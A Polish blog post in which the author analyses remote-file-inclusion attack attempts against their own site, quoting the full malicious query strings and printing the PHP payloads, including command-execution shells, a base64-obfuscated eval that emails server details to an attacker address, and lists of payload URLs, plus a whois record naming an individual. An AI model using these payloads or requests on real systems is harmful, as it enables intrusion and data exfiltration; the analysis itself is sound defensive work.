Tag: hacking

haker, cracker, kraker, hacker

haker, hacker, kraker, cracker

Prawie jak jeden chuj, podobno prawie robi wielką różnice… podobno to takie względne…

nurtujący tytuł… Kolejne ciekawe wirusowe skrypty, lub tylko avast świruje.

//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=

Takim zapytaniem ktoś próbował coś zdziałać:
//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cimagro.com.ar///administrator/components/com_virtuemart/id.txt?
Avast rozpoznaje jako: PHP:Agent-J [Trj] – Koń Trojański – infekuje cache przeglądarki: _CACHE_, _CACHE_001_ itp.

Cały ko źródłowy z pliku id.txt:

<?php
 
//Coracore Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");
if (empty($id1)) {
	$id1 = @get_current_user();
}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1 = @diskfreespace($pwd1);
$all1 = disk_total_space($pwd1);
$used = ConvertBytes($all1 - $free1);
$free = ConvertBytes(@diskfreespace($pwd1));
if (!$free) {
	$free = 0;
}
$all = ConvertBytes(@disk_total_space($pwd1));
if (!$all) {
	$all = 0;
}
if (@is_writable($pwd1)) {
	$perm = "[W]";
} else {
	$perm = "[R]";
}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
	$sf = "ON";
} else {
	$sf = "OFF";
}
 
echo "Coracore" . $sf . "<br>";
echo "uname -a:	$un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:	$sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";
 
function ConvertBytes($number) {
	$len = strlen($number);
	if ($len < 4) {
		return sprintf("%d b", $number);
	}
	if ($len >= 4 && $len <= 6) {
		return sprintf("%0.2f Kb", $number / 1024);
	}
	if ($len >= 7 && $len <= 9) {
		return sprintf("%0.2f Mb", $number / 1024 / 1024);
	}
	return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}
 
function ex($cfe) {
	$res = '';
	if (!empty($cfe)) {
		if (function_exists('exec')) {
			@exec($cfe, $res);
			$res = join("\n", $res);
		} elseif (function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		} elseif (function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (@is_resource($f = @popen($cfe, "r"))) {
			$res = "";
			while (!@feof($f)) {
				$res .= @ fread($f, 1024);
			}
			@pclose($f);
		} else {
			$res = "NULL";
		}
	}
	return $res;
}
?>
<?php
 
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7";
eval(base64_decode($lmge));
exit;
?>

Zawartość zmiennej $lmge po zdekodowaniu (base64_decode) – oczywiście kod jest wykonywany przez eval():

$creator = base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode) ? ($safez = "ON") : ($safez = "OFF_HEHE");
$base = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from = "From: " . $writ . "___=" . $safez . "<tool@" . $_SERVER['HTTP_HOST'] . ">";
mail($creator, $subj, $msg, $from);

Zawartość zmiennej $creator po zdekodowaniu (base64_decode):
fr33sh3ll@gmail.com

?_SERVER[DOCUMENT_ROOT]=

Tym razem zapytanie wykorzystywało tablicę super / auto globalną $_SERVER a dokładniej: $_SERVER[DOCUMENT_ROOT] albo tylko mi się tak wydaje. Całe zapytanie:
?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

Avast rozpoznał jako: PHP:Small-B [Trj], zwartość readme.txt:

<?php
 
echo "Mic22";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;
 
function ex($cfe) {
	$res = '';
	if (!empty($cfe)) {
		if (function_exists('exec')) {
			@exec($cfe, $res);
			$res = join("\n", $res);
		} elseif (function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		} elseif (function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif (@is_resource($f = @popen($cfe, "r"))) {
			$res = "";
			while (!@feof($f)) {
				$res .= @ fread($f, 1024);
			}
			@pclose($f);
		}
	}
	return $res;
}
 
exit;

index2.php/administrator?mosConfig_absolute_path=

Całe zapytanie:
index2.php/administrator?mosConfig_absolute_path=http://www.inflightservice.se/sas/id.txt??

Avast alarmuje: PHP:Agent-K [Trj], Koń Trojański, – infekuje cache przeglądarki: _CACHE_, _CACHE_001_ itp.

Kod id.txt:

<?
 
echo "klepek_klepek<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
exit;
?>

O co w tym chodzi…

Sam nie wiem, mogę tylko myśleć lecz nie odczuwam takiej potrzeby. Nigeryjscy hakerzy atakują.
Swoją drogą wszystko wykonane poprzez: libwww-perl/5.79

load_lang.php?_SERWEB[configdir]=

load_lang.php?_SERWEB[configdir]=

Takim o to zapytaniem ktoś próbował mi zhackować WordPressa a dokładniej:

/load_lang.php?_SERWEB[configdir]=http://for.caucasus.net/nit.txt??

Czyżby to była jakaś dziura w WordPress 2.8.2, spróbuję się dowiedzieć najpierw w rodzimym nieprzydanym języku potem pomęczę się z tłumaczeniem pytania to inglisz…

Wszystko z jednego IP: 67.215.229.226

Oczywiście jak najszybciej zaktualizowałem do 2.8.3, która jest wersją poprawiająca poprawki…

A co się znajdowało pod: http://for.caucasus.net/nit.txt

Otóż ciekawy i długi kod z którego można się wiele nauczyć. Tak pobieżnie: kasuje, robi kopie zapasową, wysyła co popadanie. przypomina to jakiegoś gotowca czy coś podobnego a no i wysyła wszystkie kopie plików na email.

jako że plugin do kolorowania składni wywala błąd 500 serwera to kod jest dostępny tu:
kod nit.txt Georgian hacker Nitrex
load_lang.php Remote File Inclusion Exploit to wiemy do czego skrypt jest

Nasz niedoszły hacker podpisuje się:

< ?
; – This Web Was Hacked And Rooted By Georgian Hacker Nitrex
?>;

Doszukując się dalszych powiązań:

person: Alexander Shakh-Nazarov
phone: +995 32 920000
e-mail: shakh@caucasus.net
nic-hdl: AS2778-RIPE
address: Caucasus Network
address: 42 Rustaveli ave.
address: Tbilisi, Georgia

Whois jednej z powiązanych domen.

I jeszcze trochę domen i skryptów:

http://www.geneseobeadstudio.com/safe.txt
http://www.geneseobeadstudio.com/cmd.txt
http://geocities.com/machinekill/cmd.txt
zhani-kalandadze.ge